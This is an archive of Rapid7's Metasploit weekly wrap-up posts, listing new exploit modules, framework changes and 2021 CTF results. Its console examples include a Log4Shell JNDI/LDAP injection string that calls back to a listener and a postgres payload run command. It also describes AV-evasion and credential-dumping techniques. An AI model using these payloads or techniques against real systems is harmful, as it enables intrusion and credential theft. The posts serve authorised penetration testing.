Tag Archives: Metasploit

Metasploit Weekly Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2022/01/21/metasploit-wrap-up-145/

Metasploit Weekly Wrap-Up
Image Credit: https://upload.wikimedia.org/wikipedia/commons/c/c7/Logs.jpg without change

while (j==shell); Log4j;

Metasploit Weekly Wrap-Up

The Log4j loop continues as we release a module targeting vulnerable vCenter releases. This is a good time to suggest that you check your vCenter releases and maybe even increase the protection surrounding them, as it’s been a rough year-plus for vCenter.

Let your shell do the walking

bcoles sent us a module that targets Grandstream GXV3175IP phones that allows remote code execution. It’s always fun to get a shell on a phone.

New module content (2)

  • Grandstream GXV3175 ‘settimezone’ Unauthenticated Command Execution by Brendan Scarvell, alhazred, and bcoles, which exploits CVE-2019-10655 – A new module has been added in that exploits CVE-2019-10655, an unauthenticated remote code execution bug in Grandstream GXV3175. Authentication is bypassed via a buffer overflow in the way the phonecookie cookie is parsed, after which a command injection vulnerability in the ‘settimezone’ action’s ‘timezone’ parameter is exploited to gain RCE as the root user.
  • VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell) by RageLtMan, Spencer McIntyre, jbaines-r7, and w3bd3vil, which exploits CVE-2021-44228 – This PR adds a vCenter-specific exploit leveraging the Log4Shell vulnerability to achieve unauthenticated RCE as root / SYSTEM. This exploit has been tested on both Windows and Linux targets.

Enhancements and features

  • #16075 from bcoles – The post/multi/manage/sudo module has been enhanced to print out a warning message and exit early if the session type that is trying to be upgraded via sudo is Meterpreter, since Meterpreter does not support sudo elevation at present.

Bugs fixed

  • #16029 from cdelafuente-r7 – A bug existed in the normalize function of lib/msf/core/opt_path.rb whereby the path parameter passed in wasn’t checked to see if it was empty prior to calling File.expand_path on it. In these cases the path returned would be that of the current directory, which could lead to unexpected results. This has been fixed with improved validation to ensure that the path parameter is not an empty string prior to expanding the path.
  • #16058 from bcoles – This change fixes a bug where a stack trace was printed in post/multi/recon/local_exploit_suggester when an invalid session option was specified.
  • #16063 from bcoles – A bug has been fixed in the local_admin_search_enum module whereby a typo was causing the module to crash on an undefined variable. The typo has been corrected and the module now accesses the correct variable. This has been addressed by fixing the typo, which should now make the module access the correct variable.
  • #15727 from NeffIsBack – This PR adds more robust NTLM message parsing with better error handling and messaging when pulling out the NTLM hashes.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Simon Janusz original https://blog.rapid7.com/2022/01/14/metasploit-weekly-wrap-up/

Log4Shell goodness

Metasploit Weekly Wrap-Up

Log4Shell made an unfortunate end to 2021 for many organizations, but it also makes for some great additions to Metasploit Framework. Contributors sempervictus, schierlm, righel, timwr and our very own Spencer McIntyre have collaborated to bring us a Log4Shell module that uses header stuffing to exploit vulnerable HTTP servers, resulting in Remote Code Execution.

SonicWall SSL VPN module for Rapid7-discovered vulnerability

Rapid7 disclosed the technical details of five vulnerabilities discovered by jbaines-r7 affecting SonicWall’s SMA-100 series of SSL VPN devices. The disclosure included landing a Metasploit module that gives remote and authenticated attackers root access to the device using CVE-2021-20039.

Pi-Hole command execution and common exploit library

An exciting new addition has worked its way into Metasploit Framework this week. Contributor h00die has created an authenticated RCE module that takes advantage of improper escaping of characters in Pi-Hole’s Top Domains API’s validDomainWildcard field. H00die has also created a library that aims to make developing future Pi-Hole modules easier.

New module content (5)

  • Pi-Hole Top Domains API Authenticated Exec by SchneiderSec and h00die, which exploits CVE-2021-32706 – This adds an auxiliary module that executes commands against Pi-Hole versions <= 5.5. This also introduces a Pi-Hole library for common functionality required in exploits against the service.

  • SonicWall SMA 100 Series Authenticated Command Injection by jbaines-r7, which exploits CVE-2021-20039 – This adds a module that exploits an authenticated command injection vulnerability in multiple versions of the SonicWALL SMA 100 series web interface. In the SSL certificate deletion functionality, the sanitization logic permits the \n character which acts as a terminator when passed to a call to system(). An authenticated attacker can execute arbitrary commands as the root user.

  • Log4Shell HTTP Header Injection by sinn3r, juan vazquez, Michael Schierl, RageLtMan, and Spencer McIntyre, which exploits CVE-2021-44228 – This adds an exploit for HTTP servers that are affected by the Log4J/Log4Shell vulnerability via header stuffing.

  • Microsoft Windows SMB Direct Session Takeover by usiegl00 – This adds a new exploit module that implements the Shadow Attack, SMB Direct Session takeover. Before running this module, a MiTM attack needs to be performed to let it intercept SMB authentication requests between a client and a server. by using any kind of ARP spoofer/poisoner tools in addition to Metasploit. If the connecting user is an administrator and network logins are allowed to the target machine, this module will execute an arbitrary payload.

  • #12217 from SkypLabs – This adds the f5 load balancer cookie to notes, and cleans up the module (rubocop/documentation/refs)

Enhancements and features

  • #15656 from HynekPetrak – This enables the vmware_vcenter_vmdir_auth_bypass module to create an admin user even if the target is not vulnerable to CVE-2020-3952, assuming we have obtained valid credentials to the vCenter LDAP directory.
  • #16021 from zeroSteiner – This adds additional tests for Meterpreter’s mkdir/rmdir functionality to ensure uniform implementations across all Meterpreters
  • #16024 from sjanusz-r7 – This adds in a new command to Meterpreter that allows the end user to kill all channels at once
  • #16040 from jmartin-r7 – Removes Ruby 2.5 support as it is officially end of life

Bugs fixed

  • #16016 from bwatters-r7 – This fixes an issue in the auxiliary/scanner/dcerpc/hidden module where the RHOSTS datastore option was not available, resulting in hosts not being scanned.
  • #16027 from zeroSteiner – This fixes an issue with tab completion for the generate command. Completion now works with both the -f and -o flags.
  • #16043 from shoxxdj – Fixes crash in the auxiliary/scanner/http/wordpress_scanner.rb module when attempting to scan themes

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Erran Carey original https://blog.rapid7.com/2022/01/07/metasploit-wrap-up-144/

Dump Windows secrets from Active Directory

Metasploit Wrap-Up

This week, our very own Christophe De La Fuente added an important update to the existing Windows Secret Dump module. It is now able to dump secrets from Active Directory, which will be very useful for Metasploit users. This new feature uses the Directory Replication Service through RPC to retrieve data such as SIDs, password history, Domain user NTLM hashes and Kerberos keys, etc. This replicates the behavior of the famous impacket secretsdump.py, with the benefit of being fully integrated with Metasploit Framework. For example, it is possible to pivot on a compromised host and run the Windows Secret Dump module against an internal Domain Controller directly from msfconsole. Furthermore, the secrets are stored in the internal database, which lets other modules access this information easily.

This update also brings another big improvement to the ruby_smb library. This adds a new DCERPC client and many ready-to-use RPC queries from Directory Replication Service (DRS) Remote Protocol, Security Account Manager (SAM) Remote Protocol and Workstation Service Remote Protocol. These will greatly simplify the process of writing modules that use DCERPC against Windows systems.

Authenticated Catch Themes Demo Import Remote Code Execution

Thank you to Ron Jost, Thinkland Security Team, and h00die for their community contribution of a Remote Code Execution exploit module against versions 1.8 and earlier of the Catch Themes Demo Import WordPress Plugin.

New module content (6)

  • Grafana Plugin Path Traversal by h00die and jordyv, which exploits CVE-2021-43798 – This aAdds a module to exploit Grafana file read vulnerability CVE-2021-43798.
  • Native LDAP Server (Example) by RageLtMan and Spencer McIntyre – This adds the initial implementation of an LDAP server implemented in Rex and updates the existing log4shell scanner module to use it as well as provides a new example module.
  • WordPress Plugin Catch Themes Demo Import RCE by Ron Jost, Thinkland Security Team, and h00die, which exploits CVE-2021-39352 – This adds an exploit for the Catch Themes Demo Import WordPress plugin for versions below 1.8. The functionality for importing a theme does not properly sanitize file formats, allowing an authenticated user to upload a php payload. Requesting the uploaded file achieves code execution as the user running the web server.
  • WordPress Popular Posts Authenticated RCE by Jerome Bruandet, Simone Cristofaro, and h00die, which exploits CVE-2021-42362 – This PR adds a new exploit for wp_popular_posts <=5.3.2.
  • ManageEngine ServiceDesk Plus CVE-2021-44077 by wvu and Y4er, which exploits CVE-2021-44077
  • Dell DBUtilDrv2.sys Memory Protection Modifier by Jacob Baines, Kasif Dekel, Red Cursor, and SentinelLabs – This module leverages a write-what-where condition in DBUtilDrv2.sys version 2.5 or 2.7 to disable or enable LSA protect on a given PID (assuming the system is configured for LSA Protection). The drivers must be provided by the user.

Enhancements and features

  • #15831 from zeroSteiner – Established SSH connections can now leverage the pivoting capabilities of the SshCommandShellBind session type.
  • #15882 from smashery – An update has been made which will prevent exploits from running a payload if the exploit drops files onto the target, but the payload doesn’t have the capability to clean those dropped files up from the target. Users can still override this setting by specifying set AllowNoCleanup true if they wish to bypass this protection.
  • #15924 from cdelafuente-r7 – This adds the NTDS technique to the Windows Secrets Dump module, enabling it to be used against Domain Controllers. It also pulls in RubySMB changes that include many DCERPC related improvements and features.
  • #15986 from bcoles – Module notes added to bash_profile_persistence now describe impacts of utilizing the module in a target environment.

Bugs fixed

  • #15982 from 3V3RYONE – This fixes a bug where modules using the SMB client would crash when the SMBUser datastore option had been explicitly unset.
  • #15984 from h00die – This PR fixes a bug in the snmp library which caused it to ignore version 1, despite specifically set options.
  • #16003 from jmartin-r7 – This fixes an issue with GitHub actions where the Ruby 3.1.0 version string is not yet being parsed correctly leading to automation failures.
  • #16015 from zeroSteiner – This fixes a regression in tab completion for the RHOSTS datastore option.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit 2021 Annual Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/01/05/metasploit-2021-annual-wrapup/

Metasploit 2021 Annual Wrap-Up

As 2022 kicks off, we now have another year in the books. Like years past, 2021 brought some surprises and had its share of celebrity vulnerabilities and recurring trends. Let’s highlight some statistics!

Quick stats

  • 651 merged pull requests from 113 users
  • 184 new modules
    • 102 exploits, 45 post, 32 auxiliary, 3 payload, and 2 evasion
  • 1 Metasploit Community CTF hosted
    • 1,501 users registered across 727 teams
    • 18 total challenges
    • 1,264 correct challenge submissions

URI support

As of Metasploit 6.1.4, users can now supply URI strings as arguments to the run command to specify RHOST values and option values at once:

use exploit/linux/postgres/postgres_payload
run postgres://administrator:[email protected] lhost=192.168.123.1 lport=5000

This new workflow will not only make it easier to use reverse-i-search with CTRL+R in Metasploit’s console — it will also make it easier to share cheat sheets among pentesters. Support includes HTTP, MySQL, PostgreSQL, SMB, SSH, and more; check out the full announcement post.

Sessions without payloads

Metasploit 2021 Annual Wrap-Up

AV evasion is a hard problem that’s not going to be solved in the foreseeable future. Payloads are caught in a variety of ways by a variety of AVs. One sustainable approach Metasploit is attempting to take is to enable users to leverage sessions that don’t require payload code to be running on the target. While not always a feasible solution, when it is, it can be quite reliable.

Earlier in 2021, community member smashery took on a large effort to enable Metasploit users to obtain interactive command shell sessions using Microsoft’s WinRM. The result is an improvement that enables the scanner/winrm/winrm_login module to open a command shell session without having uploaded a payload to the target. This session can then of course be used with post modules that are compatible with shell payloads.

msf6 auxiliary(scanner/winrm/winrm_login) > run username=Administrator password=pass rhost=192.168.123.15

[!] No active DB -- Credential data will not be saved!
[+] 192.168.123.15:5985 - Login Successful: WORKSTATION\Administator:pass
[*] Command shell session 4 opened (192.168.123.1:50321 -> 192.168.123.15:5985 ) at 2021-12-17 14:14:25 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

In a similar vein, Metasploit has for a while now had the ability to open command shell sessions from the scanner/ssh/ssh_login module. These command shell sessions could also be used with post modules that didn’t require full Meterpreter sessions. However, one notable feature that SSH servers did not support until 2021 was the ability to port-forward over these connections. Last year saw improvements to Metasploit’s handling of SSH sessions that enable both standard port forwarding (for client connections) and reverse port forwarding (for server connections). Being fully wired into Metasploit, so to speak, means users can forward connections over them using the route command in the same way they can with Meterpreter sessions.

We hope these new capabilities provide users with more options to perform their testing from Metasploit while keeping payloads entirely out of memory.

Evasion modules

Evasion modules are one of Metasploit’s most infrequently added types, but they are certainly noteworthy when they are added. Last year saw two such modules added, both targeting Windows executables. The first module, based on Johnny Shaw’s work, implemented Process Herpaderping. This novel technique obfuscates the payload’s main logic from security products. This technique was effective for a few months but was ultimately added as a detection to Windows Defender.

Another evasion module added this year was kensh1ro’s syscall module. Using direct system calls is a popular technique to evade user-mode analysis hooks, and this module brings the capability to Metasploit, too.

RDLL exploit improvements

Last year, the post exploit library used by quite a few Windows local exploits saw a great improvement that reduced code reuse and laid the foundation to randomize the target process used to host the injected DLL. Prior to this, most exploits would start notepad using a piece of template code that would then load the RDLL and, when successful, execute the payload. This often led to the notepad process making network calls, which is pretty easily identified as malicious behavior. Instead, these modules will now randomly select a binary from a list and automatically start a process of the correct architecture. No more notepad instances making network calls from exploits. Currently, the new implementation will randomly select between msiexec and netsh, both of which are widely available across Windows versions and are less likely to be identified when making network connections.

Kubernetes support

It’s safe to say that cloud computing is here to stay. Metasploit added the first modules that target the Kubernetes platform. The first module is an auxiliary module that is capable of enumerating namespace, pod, and secret information. Following up on that is an exploit module that, when provided the necessary credentials, can execute a payload within a pod. In a similar vein to the previously mentioned payload-less post-exploitation capabilities, this module can also open a direct command shell session using a new, native WebSocket implementation. We hope these modules help Metasploit users who are testing these environments and look forward to expanding on the capabilities in 2022.

Session validation

Being a framework, Metasploit offers a variety of payloads and session types. Unfortunately, not every payload yields a session type with the same capabilities (e.g. the PHP Meterpreter does not offer Kiwi). This can be very confusing for users as they’re attempting to use various post modules and Meterpreter commands. Last year, Metasploit improved the way this is handled and now offers concise error messages when certain capabilities are missing or can’t be performed with a particular session type. Now running a Meterpreter command that’s either unsupported or provided by an extension that hasn’t been loaded will be reported as such.

meterpreter > creds_all
[-] The "creds_all" command requires the "kiwi" extension to be loaded (run: `load kiwi`)
meterpreter > load kiwi
Loading extension kiwi...
[-] Failed to load extension: The "kiwi" extension is not supported by this Meterpreter type (python/osx)
[-] The "kiwi" extension is supported by the following Meterpreter payloads:
[-]   - windows/x64/meterpreter*
[-]   - windows/meterpreter*

Improved SMB capture server

SMB1 has not been enabled by default in Windows 10 since 2017. Last year, Metasploit began the long process of updating the SMB server capabilities to work with the modern SMB 2 and SMB 3 versions. The first milestone allowed the capture server (auxiliary/server/capture/smb) that collects authentication information from incoming client connections to be upgraded to support incoming connections from SMB 2 and SMB 3 clients. Today, the capture server can be used with modern versions for Windows, in their default configuration.

New module highlights

  • exploits/windows/http/exchange_proxylogon_rce – This was the first of two high-profile Exchange RCEs added to Metasploit and highlighted the need for administrators to stay on top of patching their on premises Exchange servers or migrate.
  • exploit/multi/http/git_lfs_clone_command_exec – This exploit brought along with it new capabilities for Metasploit to act as a malicious Git server. This opens the door for future modules to exploit similar vulnerabilities.
  • [exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe])(https://github.com/rapid7/metasploit-framework/pull/15567) eBPF has been a popular target for Linux LPEs this year. This particular exploit, based on @chompie1337’s original research was particularly valuable due to the number of platforms it affected as well as its reliability. Speaking of reliability…
  • exploits/linux/local/sudo_baron_samedit – Being January 2022, this particular celebrity vulnerability seems like old news. At the time, however, it gained quite a bit of attention, as it was in the ever-prevalent sudo utility. One quality that made this exploit particularly valuable was that there is no risk of system instability while exploiting it. This will likely remain a go-to exploit for users needing to escalate on Linux systems in years to come.
    auxiliary/gather/windows_secrets_dump – While not technically a new module, this particular entry saw a massive improvement in its addition of support for targeting Domain Controllers. This was a monumental effort that included a foundation that also makes it easier for modules to run attacks over DCERPC (think PrintNightmare and ZeroLogon).
  • exploit/multi/http/cve_2021_35464_forgerock_openam – Any unauthenticated RCE in an application that’s intended to be an IAM solution is worth calling out.
  • post/windows/gather/credentials/windows_sam_hivenightmare – This was another highly reliable privilege escalation technique that could be used to recover sensitive files on Windows systems. The module’s implementation performs the entire operation in memory using Meterpreter with spawning new processes or dropping artifacts to disk, making it a very stealthy approach.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Metasploit Wrap-Up

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2021/12/17/metasploit-wrap-up-143/

Log4Shell – Log4j HTTP Scanner

Metasploit Wrap-Up

Versions of Apache Log4j impacted by CVE-2021-44228 which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints.

This module will scan an HTTP endpoint for the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying instances that are vulnerable via one of the pre-determined HTTP request injection points.

This module has been successfully tested with:

  • Apache Solr
  • Apache Struts2
  • Spring Boot

Example usage:

msf6 > use auxiliary/scanner/http/log4shell_scanner 
msf6 auxiliary(scanner/http/log4shell_scanner) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 auxiliary(scanner/http/log4shell_scanner) > set SRVHOST 192.168.159.128
SRVHOST => 192.168.159.128
msf6 auxiliary(scanner/http/log4shell_scanner) > set RPORT 8080
RPORT => 8080
msf6 auxiliary(scanner/http/log4shell_scanner) > set TARGETURI /struts2-showcase/
TARGETURI => /struts2-showcase/
msf6 auxiliary(scanner/http/log4shell_scanner) > run
[*] Started service listener on 192.168.159.128:389 
[+] Log4Shell found via /struts2-showcase/%24%7bjndi%3aldap%3a%24%7b%3a%3a-/%7d/192.168.159.128%3a389/r7yol50kgg7be/%24%7bsys%3ajava.vendor%7d_%24%7bsys%3ajava.version%7d%7d/ (java: BellSoft_11.0.13)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/log4shell_scanner) >

For more details, please see the official Rapid7 Log4Shell CVE-2021-44228 analysis.

New module content (2)

  • Log4Shell HTTP Scanner by Spencer McIntyre, which exploits CVE-2021-44228 – This module performs a generic scan of a given target for the Log4Shell vulnerability by injecting it into a series of Header fields as well as the URI path.
  • WordPress WPS Hide Login Login Page Revealer by h00die and thalakus, which exploits CVE-2021-24917 – A new PR for CVE-2021-24917 was added, which is an information disclosure bug in WPS Hide Login WordPress plugin before 1.9.1. This vulnerability allows unauthenticated users to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php. Additionally, several WordPress modules were updated to more descriptively report which plugin they found as being vulnerable on a given target.

Enhancements and features

  • #15842 from adfoster-r7 – Several libraries within the lib folder have now been updated to declare Meterpreter compatibility requirements, which will allow users to more easily determine when they are using a library that the current session does not support.
  • #15936 from cmaruti – The wordlists for Tomcat Manager have been updated with new default usernames and passwords that can be used by various scanner and exploit modules when trying to find and exploit Tomcat Manager installations with default usernames and/or passwords.
  • #15944 from sjanusz-r7 – Adds long form option names to the sessions command, for example sessions --upgrade 1
  • #15965 from adfoster-r7 – Adds a TCP URI scheme for setting RHOSTS, which allows one to specify the username, password, and the port if it’s specified as a string such as tcp://user:a b [email protected] which would translate into the username user, password a b c, and host example.com on the default port used by the module in question.

Bugs fixed

  • #15779 from k0pak4 – The code of lib/msf/core/auxiliary/report.rb has been improved to fix an error whereby the report_vuln() would crash if vuln was nil prior to calling framework.db.report_vuln_attempt(). This has been fixed by checking the value of vuln and raising a ValidationError if it’s set to nil.
  • #15945 from zeroSteiner – This change fixes the Meterpreter > ls command, in the case where one of the files or folders within the listed folder was inaccessible.
  • #15952 from sjanusz-r7 – This PR adds a fix for the creds -d command which crashed on some NTLM hashes.
  • #15957 from sjanusz-r7 – A bug existed whereby a value was not correctly checked to ensure it was not nil prior to being used when saving credentials with Kiwi. This has been addressed by adding improved error checking and handling.
  • #15963 from adfoster-r7 – A bug has been fixed that prevented users using Go 1.17 from being able to run Go modules within Metasploit. Additionally the boot process has been altered so that messages about modules not loading are now logged to disk so as to not confuse users about errors in modules that they don’t plan to use.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2021/12/10/metasploit-wrap-up-142/

Word and Javascript are a rare duo.

Metasploit Wrap-Up

Thanks to thesunRider. you too can experience the wonder of this mystical duo. The sole new metasploit module this release adds a file format attack to generate a very special document. By utilizing Javascript embedded in a Word document to trigger a chain of events that slip through various Windows facilities, a session as the user who opened the document can be yours.

Do you like spiders?

It has been 3 years since SMB2 support was added to smb share enumeration and over a year ago SMB3 support was added, yet the spiders are not done spinning their webs. Thanks to sjanusz-r7 the spiders have evolved to take advantage of these new skills and the webs can span new doorways. Updates to scanner/smb/smb_enumshares improve enumeration support for the latest Windows targets that deploy with SMB3 only by default.

New module content (1)

Enhancements and features

  • #15854 from sjanusz-r7 – This updates the SpiderProfiles option as part of the scanner/smb/smb_enumshares module to now work against newer SMB3 targets, such as windows 10, Windows Server 2016, and above.
  • #15888 from sjanusz-r7 – This adds anonymised database statistics to msfconsole’s debug command, which is used to help developers track down database issues as part of user generated error reports.
  • #15929 from bcoles – This adds nine new Windows 2003 SP2 targets that the exploit/windows/smb/ms08_067_netapi module can exploit.

Bugs fixed

  • #15808 from timwr – This fixes a compatibility issue with Powershell read_file on Windows Server 2012 by using the old style Powershell syntax (New-Object).
  • #15937 from adfoster-r7 – This removes usage of SortedSet to improve support for Ruby 3.
  • #15939 from zeroSteiner – This fixes a bug where the Meterpreter dir/ls function would show the creation date instead of the modified date for the directory contents.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Congrats to the winners of the 2021 Metasploit community CTF

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2021/12/06/congrats-to-the-winners-of-the-2021-metasploit-community-ctf/

Congrats to the winners of the 2021 Metasploit community CTF

Thanks to everyone that participated in this year’s Metasploit community CTF! Like last year, this CTF ran over the past 4 days and invited community members to solve a series of challenges. This year saw 1,501 users registered across 727 teams. If you participated in the CTF, we have a feedback survey up here:

https://forms.gle/YmMR6Rrk9LCcrXzi8

Congrats to the winners of the 2021 Metasploit community CTF

Place Team Score
1 average ctf enjoyers 1800
2 deadastronauts 1800
3 LeukeTeamNaam 1800
4 PoSTLTimes 1800
5 EvilBunnyWrote 1700
6 BisonSquad 1700
7 Social Engineering Experts 1700
8 B47Sec 1700
9 AlphaSeal 1700
10 L1T 1600
11 APT593 1500
12 IML-SEC 1500
13 NYUSEC 1500
14 Neutrino_Cannon 1500
15 just use bloodhound 1500

We’ll be contacting the captains of the winning teams this week to arrange prize delivery. We want to thank CTFd again for providing the scoreboard software. We also want to thank our partners at TryHackMe for sponsoring prizes for the top 3 teams. Finally, we want to give a huge thank you to everyone that participated in this year’s CTF!

CTF Statistics

  • This year there were 18 total challenges for a maximum possible score of 1800
  • Four teams solved and captured all possible flags
  • The 4-of-hearts challenge had the most solves with 260, while the 7-of-hearts had the fewest at 6 (2.3% of registered teams)
  • A total of 265 teams made it onto the scoreboard
  • There were 1,264 correct challenge submissions and 1,524 incorrect challenge submissions
Challenge Solves
4 of Hearts 260
9 of Diamonds 201
2 of Spades 163
10 of Clubs 92
5 of Diamonds 70
4 of Diamonds 68
Jack of Hearts 61
9 of Spades 59
Ace of Hearts 56
2 of Clubs 48
8 of Clubs 43
3 of Hearts 29
Black Joker 29
5 of Clubs 27
4 of Clubs 18
Ace of Diamonds 18
3 of Clubs 16
7 of Hearts 6

As always, we’re excited to see the different approaches the hacker community took to solve our challenges as detailed in their writeups. There’s a #write-up-links channel dedicated for this in the public Slack workspace that we encourage users to check out.

Metasploit Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2021/12/03/metasploit-wrap-up-141/

Metasploit CTF 2021 starts today

Metasploit Wrap-Up

It’s that time of year again! Time for the 2021 Metasploit Community CTF. Earlier today over 1,100 users in more than 530 teams were registered and opened for participation to solve this year’s 18 challenges. Next week a recap and the winners will be announced, so stay tuned for more information.

Overlayfs LPE

This week Metasploit shipped an exploit for the recent Overlayfs vulnerability in Ubuntu Linux. The exploit works on Ubuntu 14.04 through 20.10, for both the x64 and aarch64 architectures making it very accessible. The vulnerability leverages a lack of verification within the Overlayfs implementation and can be exploited reliably.

Older Exploit Improvements

Community member bcoles made a number of improvements to some older Windows exploits this week. The exploit for MS-03-026 now includes a check method along with modules docs. MS-05-039 was tested and found to be reliable regardless of the target language pack so the target was updated to reflect this. Additionally, MS-07-029 has 13 new targets for different Server 2000 and Server 2003 language packs. This set of improvements will go a long way in helping users test these critical vulnerabilities in older versions of Windows.

New module content (1)

  • 2021 Ubuntu Overlayfs LPE by bwatters-r7 and ssd-disclosure, which exploits CVE-2021-3493 – Adds a module for the CVE-2021-3493 overlay fs local privilege escalation for Ubuntu versions 14.04 – 20.10.

Enhancements and features

  • #15914 from bcoles – This improves upon the exploit/windows/dcerpc/ms03_026_dcom module by adding a check method, documentation, and cleaning up the code.
  • #15915 from bcoles – This renames the Windows 2000 SP4 Languages targets in thems05_039_pnp exploit to Windows 2000 SP4 Universal. It has been tested and was determined to not be language pack dependent.
  • #15918 from bcoles – This adds 13 new language pack-specific targets to the ms07_029_msdns_zonename exploit.
  • #15920 from smashery – This adds tab completion support to the powershell_import command.
  • #15928 from jmartin-r7 – This updates Metasploit Framework’s default Ruby version from 2.7 to 3. There should be no end-user impact.

Bugs fixed

  • #15897 from timwr – This fixes modules that check the return value of write_file() calls by returning a boolean value instead of nil.
  • #15913 from timwr – This fixes handling for shellwords parsing of malformed user-supplied input, such as unmatched quotes, when interacting with command shell sessions.
  • #15917 from smashery – This fixes a tab completion bug in Meterpreter.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2021/11/26/metasploit-wrap-up-140/

Self-Service Remote Code Execution

Metasploit Wrap-Up

This week, our own @wvu-r7 added an exploit module that achieves unauthenticated remote code execution in ManageEngine ADSelfService Plus, a self-service password management and single sign-on solution for Active Directory. This new module leverages a REST API authentication bypass vulnerability identified as CVE-2021-40539, where an error in the REST API URL normalization routine makes it possible to bypass security filters and upload arbitrary files on the target. wvu’s new module simply uploads a Java payload to the target and executes it, granting code execution as SYSTEM if ManageEngine ADSelfService Plus was started as a service.

Storm Alert

Warning, this is not a drill! A critical unauthenticated command injection vulnerability is approaching the Nimbus service component of Apache Storm and has been given the name CVE-2021-38294. A new exploit module authored by our very own zeroSteiner has landed and will exploit this vulnerability to get you OS command execution as the user that started the Nimbus service. Please, evacuate the area immediately!

Metasploit Community CTF 2021

We’re happy to announce this year’s CTF will start on Friday, December 3, 2021! Similar to last year, the game has been designed to be accessible to beginners who want to learn and connect with the community. Keep in mind that while a team can have unlimited members, only 1,000 team spots are available, and once they’re gone you will have to join someone else’s team. You can find the full details in our blog post.

New module content (2)

Enhancements and features

  • #15887 from smashery – The path expansion code has been expanded to support path-based tab completion. Users should now tab-complete things such as cat ~/some_filenam<tab>.
  • #15889 from dwelch-r7 – An update has been made to library code so that terminal resize events are only sent if the Meterpreter client supports it. Additionally, extra feedback is now provided to users on whether or not terminal resizing is handled automatically or if they should adjust it manually.
  • #15898 from jmartin-r7 – Ruby 3.x removes support for URI.encode and URI.escape. This PR replaces uses of these functions in modules with calls to URI::DEFAULT_PARSER.escape so that Ruby 3 can run these modules instead of raising errors about missing functions.
  • #15899 from dwelch-r7 – This improves the user experience when shell is invoked from a Meterpreter session. Now, when the fully_interactive_shells feature is enabled, a message is displayed to inform the operator that a fully interactive TTY is supported. Note that you can start it by invoking shell -it.

Bugs fixed

  • #15864 from timwr – A bug has been fixed whereby the sessions -u command would not return a x64 Meterpreter session on a x64 Windows host, and would instead return a x86 session. This issue has now been addressed so that sessions -u will determine the architecture of the target host prior to upgrading and will generate a new Meterpreter session of the appropriate architecture.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Erin Bleiweiss original https://blog.rapid7.com/2021/11/19/metasploit-wrap-up-139/

Azure Active Directory login scanner module

Metasploit Wrap-Up

Community contributor k0pak4 added a new login scanner module for Azure Active Directory. This module exploits a vulnerable authentication endpoint in order to enumerate usernames without generating log events. The error code returned by the endpoint can be used to discover the validity of usernames in the target Azure tenant. If a tenant’s domain is known, the module can also be used to brute-force login credentials by providing a list of usernames and passwords.

Aerohive NetConfig RCE module

Also new this week, community contributor Erik Wynter added an exploit module for Aerohive NetConfig, versions 10.0r8a build-242466 and below. These versions are vulnerable to local file inclusion and log poisoning, as they rely on a version of PHP 5 that is affected by string truncation attacks. This allows users to achieve unauthenticated remote code execution as root on vulnerable systems.

2021 Metasploit community CTF

In case you missed the announcement earlier this week, the 2021 edition of the Metasploit community CTF is set to kick off two weeks from today! Registration starts Monday, November 22 for up to 750 teams, with capacity for an additional 250 teams once play starts on Friday, December 3. Many thanks to TryHackMe for sponsoring the event and providing some great prizes. Find some teammates and mark your calendars, because this year’s event should be a great challenge and a lot of fun for both beginners and CTF veterans!

New module content (4)

